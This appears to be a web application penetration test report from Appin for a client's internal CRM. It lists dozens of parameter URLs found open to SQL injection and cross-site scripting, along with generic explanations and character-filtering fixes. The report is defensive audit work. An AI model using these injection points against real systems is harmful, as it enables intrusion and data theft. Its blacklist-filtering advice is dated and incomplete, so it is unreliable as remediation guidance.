Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Document Details
Table of Contents
Executive Summary Goal Scope Assessment Findings Details Conclusion Recommendation 3 3 3 4 12 22 22
Executive Summary
We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security partner. We appreciate your business and look forward to provide you services in the near future. The following report presents the results of the application, as per your request. In case you have any questions, please contact your Appin representative or email contact@appinlabs.com
Goal
To provide comprehensive Penetration Testing Report of the Web Application based on OWASP Top 10 including but not limited to SQL Injection, CRLF Injections, Directory Traversals, File Inclusion, Buffer Overflow, Cross Site Scripting(XSS), Cross Site Request Forgery etc. which will help Quatrro to improve the Security level by addressing the vulnerabilities.
Scope
In depth Security Assessment of the following Web Application:
Web Application
http://10.100.4.50/testcrm/
Audit Dates
26th March
Assessment Findings
Ref Nos
Vulnerability Name
Risk Level
SQL Injection
High
http://10.100.4.50/testcrm/orderdetail_frame.php?srno =163473
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111 111144
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111 111144
High
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=1 1
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edi t&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&ids ystem=1
http://10.100.4.50/testcrm/component.php?action=edit &idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&id incident=1
http://10.100.4.50/testcrm/module.php?action=edit&id module=1
http://10.100.4.50/testcrm/promocode.php?action=edit &id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=e dit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=ed it&id=1
http://10.100.4.50/testcrm/brand_master.php?action=e dit&id=1
http://10.100.4.50/testcrm/disposition_master.php?acti on=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action= edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edi t&code=2
http://10.100.4.50/testcrm/computer_age.php?action=e dit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edi t&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edi t&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou nt=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou nt=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit &id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac c=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?ac tion=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=6 9C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=e dit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit &idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit &iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account =91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit &depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1
http://10.100.4.50/testcrm/business_agent.php?id=1
3 4
Medium Medium
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=1 1
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edi t&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&ids
ystem=1
http://10.100.4.50/testcrm/component.php?action=edit &idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&id incident=1
http://10.100.4.50/testcrm/module.php?action=edit&id module=1
http://10.100.4.50/testcrm/promocode.php?action=edit &id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=e dit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=ed it&id=1
http://10.100.4.50/testcrm/brand_master.php?action=e dit&id=1
http://10.100.4.50/testcrm/disposition_master.php?acti on=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=
edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edi t&code=2
http://10.100.4.50/testcrm/computer_age.php?action=e dit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edi t&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edi t&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou nt=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?accou nt=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit &id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&ac c=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?ac
10
tion=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=6 9C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=e dit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit &idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit &iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account =91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit &depid=3
11
http://10.100.4.50/testcrm/employeemaster.php?eid=1
http://10.100.4.50/testcrm/business_agent.php?id=1
Low
Details
http://10.100.4.50/testcrm/
Vulnerability SQL Injection Risk High Potential Security Issue It is possible to view, modify or delete database entries and tables Technical Description A common way to reduce the risk of being attacked by SQL injection is to supress detailed SQL error messages, which are usually used by attackers to easily locate scripts that are susceptible to SQL Injection. The concept behind blind SQL injection is that it is possible, even without receiving direct data from the database (in the form of an error message, or leaked information), to extract data from the database, one bit at a time, or to modify the query in a malicious way. The idea is that the
12
application behavior (result identical to the original result, or result different than the original result) can provide a single bit of information about the evaluated (modified) query, meaning, it's possible for the attacker to formulate an SQL Boolean expression whose evaluation (single bit) is compromised in the form of the application behavior (identical/un-identical to the original behavior). Fix Recommendations There are several issues whose remediation lies in sanitizing user input. By verifying that user input does not contain hazardous characters, it is possible to prevent malicious users from causing your application to execute unintended operations, such as launch arbitrary SQL queries, embed Javascript code to be executed on the client side, run various operating system commands etc. It is advised to filter out all the following characters: [1] | (pipe sign) [2] & (ampersand sign) [3] ; (semicolon sign) [4] $ (dollar sign) [5] % (percent sign) [6] @ (at sign) [7] ' (single apostrophe) [8] " (quotation mark) [9] \' (backslash-escaped apostrophe) [10] \" (backslash-escaped quotation mark) [11] <> (triangular parenthesis) [12] () (parenthesis) [13] + (plus sign)
13
[14] CR (Carriage return, ASCII 0x0d) [15] LF (Line feed, ASCII 0x0a) [16] , (comma sign) [17] \ (backslash)
14
http://10.100.4.50/testcrm/
Vulnerability Cross Site Scripting Risk High Potential Security Issue It is possible to steal or manipulate customer session and cookies, which might be used to impersonate a legitimate user, allowing the hacker to view or alter user records, and to perform transactions as that user. Technical Description The Cross-Site Scripting attack is a privacy violation, that allows an attacker to acquire a legitimate user's credentials and to impersonate that user when interacting with a specific website. The attack hinges on the fact that the web site contains a script that returns a user's input (usually a parameter value) in an HTML page, without first sanitizing the input. This allows an input consisting of JavaScript code to be executed by the browser when the script returns this input in the response page. As a result, it is possible to form links to the site where one of the parameters consists of malicious JavaScript code. This code will be executed (by a user's browser) in the site context, granting it access to cookies that the user has for the site, and other windows in the site through the user's browser. Possible actions that can be performed by the script are: [1] Send user's cookies (for the legitimate site) to the attacker. [2] Send information that is accessible through the DOM (URLs, Form fields, etc.), to the attacker. The result is that the security and privacy of the victim user is compromised on the vulnerable site. Fix Recommendations Sanitize user input & filter out JavaScript code. We suggest you filter the following characters:
15
[1] <> (triangular parenthesis) [2] " (quotation mark) [3] ' (single apostrophe) [4] % (percent sign) [5] ; (semicolon) [6] () (parenthesis) [7] & (ampersand sign) [8] + (plus sign)
16
17
http://10.100.4.50/testcrm/
Vulnerability Unencrypted Login Request Risk Medium Potential Security Issue It may be possible to steal user login information such as usernames and passwords that are sent unencrypted. Technical Description
During the application test, it was detected that an unencrypted login request was sent to the server. Since some of the input fields used in a login process (for example: usernames, passwords, etc.) are personal and sensitive, it is recommended that they should be sent to the server over an encrypted connection.
Fix Recommendations
Make sure that all login requests are sent encrypted to the server (e.g. SSL).
18
http://10.100.4.50/testcrm/
Vulnerability Phishing Through Frames Risk Medium Potential Security Issue It is possible to persuade a naive user to supply sensitive information such as username, password, credit card number etc. Technical Description It is possible for an attacker to inject a frame or an iframe tag with malicious content which resembles the attacked site. An incautious user may browse it and not realize that he is leaving the original site and surfing to a malicious site. The attacker may then lure the user to login again, thus acquiring his login credentials. The fact that the fake site is embedded in the original site helps the attacker by giving his phishing attempts a more reliable appearance. Fix Recommendations It is advised to filter out all the following characters: [1] | (pipe sign) [2] & (ampersand sign) [3] ; (semicolon sign) [4] $ (dollar sign) [5] % (percent sign) [6] @ (at sign) [7] ' (single apostrophe) [8] " (quotation mark) [9] \' (backslash-escaped apostrophe) [10] \" (backslash-escaped quotation mark) [11] <> (triangular parenthesis) [12] () (parenthesis) [13] + (plus sign) [14] CR (Carriage return, ASCII 0x0d) [15] LF (Line feed, ASCII 0x0a)
19
20
http://10.100.4.50/testcrm/
Vulnerability Directory Listing Enabled Risk Low Potential Security Issue It is possible to view and download the contents of certain web application virtual directories, which might contain restricted files. Technical Description If the web server was configured improperly, it is possible to retrieve a directory listing by sending a request for a specific directory, rather than for a file. Fix Recommendations [1] Configure the web server to deny listing of directories. [2] Download a specific security patch according to the issue existing on your web server or web application.
21
Conclusion
On the basis of penetration testing carried out on your web application it can be concluded that web application does contain vulnerabilities.
Recommendation
High
22